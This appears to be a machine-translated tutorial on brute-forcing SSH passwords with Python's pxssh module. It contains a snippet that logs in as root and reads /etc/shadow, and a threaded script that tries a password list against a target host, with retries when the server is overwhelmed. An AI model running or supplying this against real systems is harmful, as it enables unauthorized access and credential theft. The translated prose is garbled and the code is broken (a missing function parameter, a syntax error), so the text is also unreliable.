Catalog
One 、Pxssh Brute force SSH password
1.1、 function :
1.2、 Use Pxssh simplify
1.3、 function :
1.4、 automation
1.1、 function :
prompt(): yes javascript A method in language , The main purpose is to display the prompt dialog box
pxssh The module is used in python in ssh Remote connection , Carry out orders , Return results , But don't support Windows System
1.2、 Use Pxssh simplify
use Pxssh Further simplify it ,Pxssb It's one that contains pexpect Special script for Library , It can be written in advance login()、logout() and prompt() Equifunction directly with SSH Interact . Use Pxssh You can simplify the last script into
import pxssh def send_command(s, cmd): s.sendline(cmd) s.prompt() print(s.before) def connect(host, user, password): try: s = pxssh.pxssh() s.login( host, user, password ) return s except: print('[-] Error Connecting') exit( 0 ) s = connect ('127.0.0.1', 'root', 'toor') send_command(s, 'cat /etc/shadow | grep root')
1.3、 function :
BoundedSemaphore(n): At most at the same time n Threads access specific resources
global: Overall
release: Release
add_option Add setting options
acquire The method is Python Lock class ,Python Thread module in Lock Class's built-in methods
Thread Is the execution thread in the program
1.4、 automation
With some more modifications, the script can automatically perform brute force cracking SSH Task of password . In addition to adding some parameter parsing code to read the hostname 、 The user name and the file containing the password to be tried , Only need to connect() Function slightly modified .
If login() Function executed successfully , And there's no exception thrown , A message will be printed , Indicates that the password has been found and sets the global Boolean value indicating that the password has been found to true. otherwise , The exception will be caught . If the exception shows that the password is rejected , Know this password is wrong , Just let the function return . however , If the exception shows socket by “ read_nonblocking", May be SSH The server was blown up by a large number of connections , You can wait a moment and try again with the same password . Besides , If the exception displays pxssh Command prompt extraction is difficult , You should also wait for a while , Then let it try again .
stay connect() There is a Boolean quantity in the parameter of the function release. because connect() You can recursively call another connect(), Must let only not by connect() Recursively called connect() Function can release connection_lock The signal .
import pxssh import optparse import time from threading import * maxConnections = 5 connection_lock = BoundedSemaphore(value=maxConnections) Found = False Fails = 0 def connect(host, user, password): global Found global Fails try: s = pxssh.pxssh() s.login(host, user, password) print('[+] Password Found: ' + password) Found = True except Exception as e: if 'read_nonblocking' in str(e): Fails += 1 time.sleep( 5 ) connect(host, user, password, False) elif 'synchronize with original prompt' in str(e): time.sleep( 1 ) connect( host, user, password, False ) finally: if release: connection_lock.release() def main(): parser = optparse.OptionParser( 'usage %prog ' + '-H <target host> -u <user> -F <password list>' ) parser.add_option( '-H', dest= ' tgtHost', type='string', help=' specify target host') parser.add_option( '-F', dest= ' passwdFile', type='string', help='specify password file') parser.add_option( '-u', dest='user', type = 'string', help = 'specify the user') (options, args) = parser.parse_args() host = options.tgtHost passwdFile = options.passwdFile user= options.user if host== None or passwdFile = None or user = None: print(parser.usage) exit(0) user = options.user fn = open( passwdFile,'r') user = options.user for line in fn.readlines(): user = options.user if Found: print("[*] Exiting: Password Found") exit(0) if Fails > 5: print("[!] Exiting: Too Many Socket Timeouts") exit(0) connection_lock.acquire() password = line.strip('\r').strip('\n') print("[-] Testing: " + str(password)) t = Thread(target=connect, args=(host, user, password, True)) child = t.start() if __name__ == '__main__': main()
